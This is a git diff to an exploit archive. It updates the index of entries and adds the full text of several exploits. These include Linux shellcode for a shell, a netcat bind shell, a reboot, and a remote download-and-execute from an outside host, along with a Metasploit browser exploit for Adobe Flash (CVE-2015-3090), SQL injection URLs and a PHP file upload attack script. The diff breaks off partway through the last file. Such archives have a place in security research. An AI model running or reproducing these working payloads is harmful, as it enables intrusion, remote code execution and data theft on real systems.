diff --git a/files.csv b/files.csv
index 5ca0a8e9b..627ac1d6e 100755
--- a/files.csv
+++ b/files.csv
@@ -33375,7 +33375,7 @@ id,file,description,date,author,platform,type,port
 36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04  - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
-37186,platforms/php/webapps/37186.txt,"vfront-0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
+37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
 36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@@ -33612,6 +33612,10 @@ id,file,description,date,author,platform,type,port
 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
+37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin index.php id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0
+37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0
+37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS 'car-details.php' SQL Injection Vulnerability",2012-06-03,Am!r,php,webapps,0
+37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 'doupload.php' Arbitrary File Upload Vulnerability",2015-06-05,"Sammy FORGIT",php,webapps,0
 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0
 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
@@ -33670,6 +33674,7 @@ id,file,description,date,author,platform,type,port
 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
 37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
+37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x 'main_bigware_54.php' SQL Injection Vulnerability",2012-06-05,rwenzel,php,webapps,0
 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (21 bytes) (2)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
@@ -33691,13 +33696,30 @@ id,file,description,date,author,platform,type,port
 37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
 37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
 37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0
+37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) - 29 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
+37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 - 60 bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
+37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 'member.php' SQL Injection Vulnerability",2012-06-06,MR.XpR,php,webapps,0
+37356,platforms/php/webapps/37356.txt,"WordPress Email Newsletter Plugin 8.0 'option' Parameter Information Disclosure Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
+37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 'vw_upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0
 37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 knowledgebase.php search Parameter XSS",2012-05-31,"Shadman Tanjim",php,webapps,0
 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 'nsextt' Parameter Cross Site Scripting Vulnerability",2012-06-01,Aboud-el,php,webapps,0
 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0
 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
 37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
+37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
+37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
+37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80
 37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion  Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
 37349,platforms/windows/dos/37349.txt,"Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
+37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
+37362,platforms/lin_x86-64/shellcode/37362.c,"linux/x86-64 execve(/bin/sh) 30 bytes",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
+37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection Vulnerabilities",2015-06-24,cfreer,php,webapps,80
+37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
+37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86  Downloand & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
+37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86  Reboot - 28 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
+37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
+37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
+37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/lin_x86-64/shellcode/37362.c b/platforms/lin_x86-64/shellcode/37362.c
new file mode 100755
index 000000000..716da04ca
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/37362.c
@@ -0,0 +1,33 @@
+/*
+William Borskey 2015
+Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm.
+
+  1 ; int execve(const char *filename, char *const argv[], char *const envp[]);
+  2 BITS 64
+  3 
+  4 section .text
+  5         global start
+  6 
+  7 start:
+  8         mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in 
+  9                                     ;little endian byte order into rcx padded with 11
+ 10         shl rcx, 0x08               ;left shift to trim off the two bytes of padding    
+ 11         shr rcx, 0x08               ;ringht shift to re order string
+ 12         push rcx                    ;push the immediate value stored in rcx onto the stack
+ 13         lea rdi, [rsp]              ;load the address of the string that is on the stack into rsi
+ 14         xor rdx, rdx                ;zero out rdx for an execve argument
+ 15         mov al, 0x3b                ;move 0x3b (execve sycall) into al to avoid nulls
+ 16         syscall                     ;make the syscall
+*/
+
+char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05";
+
+int main(int argc, char **argv)
+{
+    int (*func)();
+    func = (int (*)()) shellcode;
+    (int)(*func)();
+     return 0;
+}
+
+
diff --git a/platforms/lin_x86/shellcode/37358.c b/platforms/lin_x86/shellcode/37358.c
new file mode 100755
index 000000000..73515536f
--- /dev/null
+++ b/platforms/lin_x86/shellcode/37358.c
@@ -0,0 +1,42 @@
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+
+
+#Auxiliary tools (50% time gain !)
+#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
+#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/ASMtoShellcode.py
+
+
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060:	31 c0                	xor    %eax,%eax
+ 8048062:	50                   	push   %eax
+ 8048063:	68 48 41 43 4b       	push   $0x4b434148  #You can change it !
+ 8048068:	b0 27                	mov    $0x27,%al
+ 804806a:	89 e3                	mov    %esp,%ebx
+ 804806c:	66 41                	inc    %cx
+ 804806e:	cd 80                	int    $0x80
+ 8048070:	b0 0f                	mov    $0xf,%al
+ 8048072:	66 b9 ff 01          	mov    $0x1ff,%cx
+ 8048076:	cd 80                	int    $0x80
+ 8048078:	31 c0                	xor    %eax,%eax
+ 804807a:	40                   	inc    %eax
+ 804807b:	cd 80                	int    $0x80
+
+
+#include <stdio.h>
+#include <string.h>
+
+char *shellcode =
+"\x31\xc0\x50\x68\x48\x41\x43\x4b\xb0\x27\x89\xe3\x66\x41\xcd\x80\xb0\x0f\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80";
+
+
+//First push always start with byte 68.Also mov b0.
+//Than just push your string between byte 68 - b0 ! :)
+//Here it is -> \x68   "\x48\x41\x43\x4b\"    xb0     GOODLUCK !
+
+
+int main(void){
+	fprintf(stdout,"Length: %d\n",strlen(shellcode));
+	(*(void(*)()) shellcode)();}
diff --git a/platforms/lin_x86/shellcode/37359.c b/platforms/lin_x86/shellcode/37359.c
new file mode 100755
index 000000000..1af3adca4
--- /dev/null
+++ b/platforms/lin_x86/shellcode/37359.c
@@ -0,0 +1,54 @@
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+#Concat : Do not disturb - Bomberman
+
+
+#Netcat openbsd version (which is default installed in ubuntu) have
+not "-e" option.
+#So if you are trying to test on ubuntu(like me) you must change
+version to traditional.
+
+#Typing this:
+	#1) sudo update-alternatives --config nc
+	#2) Select the option /bin/nc.traditional
+
+
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060:	31 c0                	xor    %eax,%eax
+ 8048062:	50                   	push   %eax
+ 8048063:	68 6e 2f 6e 63       	push   $0x636e2f6e
+ 8048068:	68 2f 2f 62 69       	push   $0x69622f2f
+ 804806d:	89 e3                	mov    %esp,%ebx
+ 804806f:	50                   	push   %eax
+ 8048070:	68 35 35 35 35       	push   $0x35353535 		#PORT
+ 8048075:	68 2d 6c 74 70       	push   $0x70746c2d
+ 804807a:	89 e1                	mov    %esp,%ecx
+ 804807c:	50                   	push   %eax
+ 804807d:	68 2f 2f 73 68       	push   $0x68732f2f
+ 8048082:	68 2f 62 69 6e       	push   $0x6e69622f
+ 8048087:	68 2d 65 2f 2f       	push   $0x2f2f652d
+ 804808c:	89 e2                	mov    %esp,%edx
+ 804808e:	50                   	push   %eax
+ 804808f:	52                   	push   %edx
+ 8048090:	51                   	push   %ecx
+ 8048091:	53                   	push   %ebx
+ 8048092:	89 e7                	mov    %esp,%edi
+ 8048094:	b0 0b                	mov    $0xb,%al
+ 8048096:	89 f9                	mov    %edi,%ecx
+ 8048098:	31 d2                	xor    %edx,%edx
+ 804809a:	cd 80                	int    $0x80
+
+#include <stdio.h>
+#include <string.h>
+
+char *loveme = "\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x35\x35\x35"
+				"\x35\x68\x2d\x6c\x74\x70\x89\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68"
+				"\x2d\x65\x2f\x2f\x89\xe2\x50\x52\x51\x53\x89\xe7\xb0\x0b\x89\xf9\x31\xd2\xcd\x80";
+
+// "\x68-----\x35\x35\x35\x35\-------x68\"  There port change however you like.
+
+int main(void){
+	fprintf(stdout,"Length: %d\n",strlen(loveme));
+	(*(void(*)()) loveme)();}
diff --git a/platforms/lin_x86/shellcode/37365.c b/platforms/lin_x86/shellcode/37365.c
new file mode 100755
index 000000000..5339d3b7f
--- /dev/null
+++ b/platforms/lin_x86/shellcode/37365.c
@@ -0,0 +1,129 @@
+Linux/x86  Downloand&Execute
+
+
+------WE ARE BOMBERMANS----
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+#Just the two of us LOL.
+
+
+Info!
+	This shellcode has two part.Because when using fork in asm, ocurrs problems in shellcode.
+	So you can use multiprocessing to do this.
+	If you dont want problem while running shellcodes.
+	I did not calculate len bytes.Because its completely depend url length.
+
+	TESTED ON : Ubuntu 14.04
+
+
+/*
+The NX Bit prevents random data being executed on modern processors and OSs.
+To get around it, call mprotect. 
+You should also define your shellcode as a binary instead of a character string.
+
+-By Philipp Hagemeister
+
+Emmy goes to  Philipp Hagemeister ! ! (clap clap clap clap)
+Special thanks :)  ..
+*/
+
+;https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
+;Use it convert string to stack.
+
+
+#Remote file download#
+
+08048060 <.text>:
+ 8048060:	31 c0                	xor    %eax,%eax
+ 8048062:	50                   	push   %eax
+ 8048063:	68 68 65 6c 6c       	push   $0x6c6c6568
+ 8048068:	68 62 34 6d 2f       	push   $0x2f6d3462
+ 804806d:	68 2f 62 33 6d       	push   $0x6d33622f
+ 8048072:	68 6d 2f 2f 2f       	push   $0x2f2f2f6d
+ 8048077:	68 73 2e 63 6f       	push   $0x6f632e73
+ 804807c:	68 78 69 6d 61       	push   $0x616d6978
+ 8048081:	68 33 2e 6d 65       	push   $0x656d2e33 ;3.meximas.com/b3mb4m/hell
+ 8048086:	89 e1                	mov    %esp,%ecx
+ 8048088:	50                   	push   %eax
+ 8048089:	68 77 67 65 74       	push   $0x74656777
+ 804808e:	68 62 69 6e 2f       	push   $0x2f6e6962
+ 8048093:	68 75 73 72 2f       	push   $0x2f727375
+ 8048098:	68 2f 2f 2f 2f       	push   $0x2f2f2f2f
+ 804809d:	89 e3                	mov    %esp,%ebx
+ 804809f:	50                   	push   %eax
+ 80480a0:	50                   	push   %eax
+ 80480a1:	51                   	push   %ecx
+ 80480a2:	53                   	push   %ebx
+ 80480a3:	89 e1                	mov    %esp,%ecx
+ 80480a5:	b0 0b                	mov    $0xb,%al
+ 80480a7:	cd 80                	int    $0x80
+ 80480a9:	31 c0                	xor    %eax,%eax
+ 80480ab:	fe c0                	inc    %al
+ 80480ad:	cd 80                	int    $0x80
+
+
+#Download&Chmod777&Execute 
+
+08048060 <.text>:
+ 8048060:	31 c0                	xor    %eax,%eax
+ 8048062:	31 c9                	xor    %ecx,%ecx
+ 8048064:	50                   	push   %eax
+ 8048065:	68 68 65 6c 6c       	push   $0x6c6c6568 ;file name(hell)
+ 804806a:	b0 0f                	mov    $0xf,%al  
+ 804806c:	89 e3                	mov    %esp,%ebx
+ 804806e:	66 b9 ff 01          	mov    $0x1ff,%cx
+ 8048072:	cd 80                	int    $0x80
+ 8048074:	31 c0                	xor    %eax,%eax
+ 8048076:	50                   	push   %eax
+ 8048077:	89 e2                	mov    %esp,%edx
+ 8048079:	53                   	push   %ebx
+ 804807a:	89 e1                	mov    %esp,%ecx
+ 804807c:	b0 0b                	mov    $0xb,%al
+ 804807e:	cd 80                	int    $0x80
+
+
+
+Than lets back python.
+
+
+#!/usr/bin/python
+
+import ctypes
+import multiprocessing
+import time
+
+
+def download(firstone="Capture"):
+	if firstone != "Capture":
+		#Download codes.
+		shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\x68\x62\x34\x6d\x2f\x68\x2f\x62"
+			b"\x33\x6d\x68\x6d\x2f\x2f\x2f\x68\x73\x2e\x63\x6f\x68\x78\x69\x6d\x61\x68\x33\x2e"
+			b"\x6d\x65\x89\xe1\x50\x68\x77\x67\x65\x74\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f"
+			b"\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xfe"
+			b"\xc0\xcd\x80")
+	else:	
+		time.sleep(30)#Time delay, depend ur file size.
+		shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\xb0\x0f\x89\xe3\x66\xb9\xff\x01"
+			b"\xcd\x80\x31\xc0\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
+		#Chomd777 and execute it.
+	shellcode = ctypes.c_char_p(shellcode_data)
+	function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
+
+	addr = ctypes.cast(function, ctypes.c_void_p).value
+	libc = ctypes.CDLL('libc.so.6')
+	pagesize = libc.getpagesize()
+	addr_page = (addr // pagesize) * pagesize
+	for page_start in range(addr_page, addr + len(shellcode_data), pagesize):
+	    assert libc.mprotect(page_start, pagesize, 0x7) == 0
+	function()    
+
+
+for x in xrange(0, 2):
+	if x == 0:
+		first = multiprocessing.Process(target=download, args=("KnockKnock",)) 
+	else:
+		first = multiprocessing.Process(target=download) 
+	first.start()	
+
+
+#Bomberman Team presented !!
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/37366.c b/platforms/lin_x86/shellcode/37366.c
new file mode 100755
index 000000000..4be8eae2e
--- /dev/null
+++ b/platforms/lin_x86/shellcode/37366.c
@@ -0,0 +1,34 @@
+Linux/x86  Reboot - 28Bytes
+
+
+#Greetz : Bomberman(Leader)
+#Author : B3mB4m
+#Tested ON : Ubuntu 14.04
+
+
+08048060 <.text>:
+ 8048060:	31 c0                	xor    %eax,%eax
+ 8048062:	50                   	push   %eax
+ 8048063:	68 62 6f 6f 74       	push   $0x746f6f62
+ 8048068:	68 6e 2f 72 65       	push   $0x65722f6e
+ 804806d:	68 2f 73 62 69       	push   $0x6962732f
+ 8048072:	89 e3                	mov    %esp,%ebx
+ 8048074:	50                   	push   %eax
+ 8048075:	53                   	push   %ebx
+ 8048076:	89 e1                	mov    %esp,%ecx
+ 8048078:	b0 0b                	mov    $0xb,%al
+ 804807a:	cd 80                	int    $0x80
+
+
+
+#include <stdio.h>
+#include <string.h>
+
+char *shellcode = "\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e\x2f\x72\x65"
+"\x68\x2f\x73\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+
+int main(void){
+	fprintf(stdout,"Length: %d\n",strlen(shellcode));
+	(*(void(*)()) shellcode)();
+}
diff --git a/platforms/multiple/remote/37368.rb b/platforms/multiple/remote/37368.rb
new file mode 100755
index 000000000..bd19d1d36
--- /dev/null
+++ b/platforms/multiple/remote/37368.rb
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                => 'Adobe Flash Player ShaderJob Buffer Overflow',
+      'Description'         => %q{
+        This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
+        Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
+        same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
+        of the ShaderJob after starting the job it's possible to create a buffer overflow condition
+        where the size of the destination buffer and the length of the copy are controlled. This
+        module has been tested successfully on:
+        * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
+        * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
+        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
+        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Chris Evans', # Vulnerability discovery
+          'Unknown', # Exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2015-3090'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
+          ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
+          ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
+        ],
+      'Payload'             =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
+            end
+
+            false
+          end
+        },
+      'Targets'             =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => 'May 12 2015',
+      'DefaultTarget'       => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+
+    if target.name =~ /Windows/
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      platform_id = 'linux'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/37350.txt b/platforms/php/webapps/37350.txt
new file mode 100755
index 000000000..444901ff9
--- /dev/null
+++ b/platforms/php/webapps/37350.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53764/info
+
+AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AdaptCMS 2.0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/37351.txt b/platforms/php/webapps/37351.txt
new file mode 100755
index 000000000..95979926e
--- /dev/null
+++ b/platforms/php/webapps/37351.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53764/info
+ 
+AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+ 
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+AdaptCMS 2.0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ] 
\ No newline at end of file
diff --git a/platforms/php/webapps/37352.txt b/platforms/php/webapps/37352.txt
new file mode 100755
index 000000000..82d71c8ee
--- /dev/null
+++ b/platforms/php/webapps/37352.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53771/info
+
+Ignite Solutions CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/car-details.php?ID=[Sql] 
\ No newline at end of file
diff --git a/platforms/php/webapps/37353.php b/platforms/php/webapps/37353.php
new file mode 100755
index 000000000..801aa7412
--- /dev/null
+++ b/platforms/php/webapps/37353.php
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/53790/info
+
+The Nmedia WordPress Member Conversation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Nmedia WordPress Member Conversation 1.35.0 is vulnerable; other versions may also be affected. 
+
+<?php
+
+$uploadfile="lo.php";
+$ch = 
+curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wordpress-member-private-conversation/doupload.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+         array('Filedata'=>"@$uploadfile",
+         'folder'=>"/test/"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Shell Access :
+http://www.exemple.com/wordpress/wp-content/uploads/user_uploads/test/lo.php
+
+lo.php
+<?php
+phpinfo();
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/37354.py b/platforms/php/webapps/37354.py
new file mode 100755
index 000000000..891c331ba
--- /dev/null
+++ b/platforms/php/webapps/37354.py
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/53810/info
+
+Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
